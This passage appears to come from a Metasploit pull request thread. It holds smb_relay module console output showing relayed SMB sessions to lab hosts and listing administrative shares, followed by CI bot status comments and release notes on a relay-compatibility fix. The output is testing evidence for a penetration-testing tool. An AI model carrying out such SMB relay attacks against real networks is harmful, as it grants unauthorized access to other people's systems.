    2  IPC$    IPC|SPECIAL   Remote IPC
    3  share   DISK

SMB (192.168.5.10) > exit
[*] Shutting down session: 1

[*] 192.168.5.10 - SMB session 1 closed.  Reason: User exit
msf exploit(windows/smb/smb_relay) > sessions -i 2
[*] Starting interaction with 2...

SMB (192.168.220.134) > shares
Shares
======

    #  Name    Type          comment
    -  ----    ----          -------
    0  ADMIN$  DISK|SPECIAL  Remote Admin
    1  C$      DISK|SPECIAL  Default share
    2  IPC$    IPC|SPECIAL   Remote IPC
    3  share   DISK

SMB (192.168.220.134) > exit
[*] Shutting down session: 2

[jenkins-eks-metasploit]

Additional test pipeline started ⌛
Note: build results only accessible to maintainers.

[jenkins-eks-metasploit]

Pipeline results available

Slice summary:

• Test slice 1 - 🟢
• Test slice 2 - 🟢
• Test slice 3 - 🟢
• Test slice 4 - 🟢

Note: build results only accessible to maintainers.

[jenkins-eks-metasploit]

Pipeline results available

Slice summary:

• Test slice 1 - 🟢
• Test slice 2 - 🟢
• Test slice 3 - 🟢
• Test slice 4 - 🟢

Note: build results only accessible to maintainers.

[cdelafuente-r7]

Release Notes

This fix an issue that prevents successful authentication relay from Ruby SMB Client and smbclient. These clients are now compatible with Msf::Exploit::Remote::SMB::RelayServer.